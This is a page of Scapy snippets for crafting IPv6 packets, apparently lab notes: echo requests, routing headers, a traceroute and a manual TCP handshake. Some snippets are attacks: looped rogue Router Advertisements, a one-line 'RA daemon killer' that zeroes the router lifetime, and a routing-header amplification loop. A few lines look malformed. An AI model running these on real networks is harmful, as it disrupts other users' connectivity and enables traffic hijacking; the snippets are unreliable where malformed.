IPv6 Scapy Samples

 IPv6 ICMP
 icmp ipv6 request

     i=IPv6()
     i.dst="2001:db8:dead::1"
     q=ICMPv6EchoRequest()
     p=(i/q)
     sr1(p)
 ipv6 source route packets
     i=IPv6()
     i.dst="2001:db8:dead::1"
     h=IPv6ExtHdrRouting()
     h.addresses=["2001:db8:dead::1","2001:db8:dead::1","2001:db8:dead::1"]
     p=ICMPv6EchoRequest()
     pa=(i/h/p)
 Routing Header Example
     a = sr1(IPv6(dst="2001:4f8:4:7:2e0:81ff:fe52:9a6b")/ \
     IPv6ExtHdrRouting(addresses=["2001:78:1:32::1", "2001:20:82:203:fea5:385"])/ \
     ICMPv6EchoRequest(data=RandString(7)), verbose=0)
     a.src
 Traceroute
     waypoint = "2001:301:0:8002:203:47ff:fea5:3085"
     target = "2001:5f9:4:7:2e0:81ff:fe52:9a6b"
     traceroute6(waypoint, minttl=15 ,maxttl=34,l4=IPv6ExtHdrRouting(addresses=[target])/ICMPv6EchoRequest(data=RandString(7)))
 Current high score (not tested)
       addr1 = "2001:4830:ff:12ea::2"
       addr2 = "2001:360:1:10::2"
       zz=time.time();
       a=sr1(IPv6(dst=addr2, hlim=255)/IPv6ExtHdrRouting(addresses=[addr1, addr2]*43)/ICMPv6EchoRequest(data="staythere"), verbose=0, timeout=80);
       print "%.2f seconds" % (time.time() - zz)
 ipv6 NA (version 1)
     sendp(Ether()/IPv6()/ICMPv6ND_RA()/ ICMPv6NDOptPrefixInfo(prefix="2001:db8:cafe:deca::", prefixlen=64)/ ICMPv6NDOptSrcLLAddr(lladdr="00:b0:de:ad:be:ef"), loop=1, inter=3)

 ipv6 NA (version 2)
     a=IPv6(nh=58, src='fe80::214:f2ff:fe07:af0', dst='ff02::1', version=6L, hlim=255, plen=64, fl=0L, tc=224L)
     b=ICMPv6ND_RA(code=0, chlim=64, H=0L, M=0L, O=0L, routerlifetime=1800, P=0L, retranstimer=0, prf=0L, res=0L, reachabletime=0, type=134)
     c=ICMPv6NDOptSrcLLAddr(type=1, len=1, lladdr='00:14:f2:07:0a:f1')
     d=ICMPv6NDOptMTU(res=0, type=5, len=1, mtu=1500)
     e=ICMPv6NDOptPrefixInfo(A=1L, res2=0, res1=0L, L=1L, len=4, prefix='2001:db99:dead::', R=0L, validlifetime=2592000, prefixlen=64, preferredlifetime=604800, type=3)
     send(a/b/c/d/e)
 The one line Router Advertisement daemon killer
     send(IPv6(src=server)/ICMPv6ND_RA(routerlifetime=0), loop=1, inter=1)
 Test1
     someaddr=["2001:6c8:6:4::7", "2001:500::1035", "2001:1ba0:0:4::1",
     "2001:2f0:104:1:2e0:18ff:fea8:16f5", "2001:e40:100:207::2",
     "2001:7f8:2:1::18", "2001:4f8:0:2::e", "2001:4f8:0:2::d"]

     for addr in someaddr:
       a = sr1(IPv6(dst=addr)/ICMPv6NIQueryName(data=addr), verbose=0)
       print a.sprintf( "%-35s,src%: %data%")
 Test2
     someaddr=["2001:6c8:6:4::7", "2001:500::1035", "2001:1ba0:0:4::1",
     "2001:2f0:104:1:2e0:18ff:fea8:16f5", "2001:e40:100:207::2",
     "2001:7f8:2:1::18", "2001:4f8:0:2::e", "2001:4f8:0:2::d"]

     for addr in someaddr:
       a = sr1(IPv6(dst="ff02::1")/ICMPv6NIQueryName(data="ff02::1"))
       print a.sprintf( "%data%")

 IPv6 Scapy 3 Way
 Creating a IPv6 3 Way Handshake

 Step 1.
 trun off the RST Packets from the Kernel, because no listen Port on the Source Port. (Scapy is not unsing RAW Socket)
 iptables -A OUTPUT -p tcp --tcp-flags RST RST -d {dest IP} -j DROP  
 Step 2.
 Send th SYN Packet with scapy and fetch the answer.
     ip=IPv6(dst="2001:db8:0:1:207:3fff:fe68:df44")
     TCP_SYN=TCP(sport=1500, dport=80, flags="S", seq=100)
     TCP_SYNACK=sr1(ip/TCP_SYN)
 Step 3.
 Send the ACK Packet with scapy
     my_ack = TCP_SYNACK.seq + 1
     TCP_ACK=TCP(sport=1500, dport=80, flags="A", seq=101, ack=my_ack)
     send(ip/TCP_ACK)
 Step 4.
 Check the client with netstat -na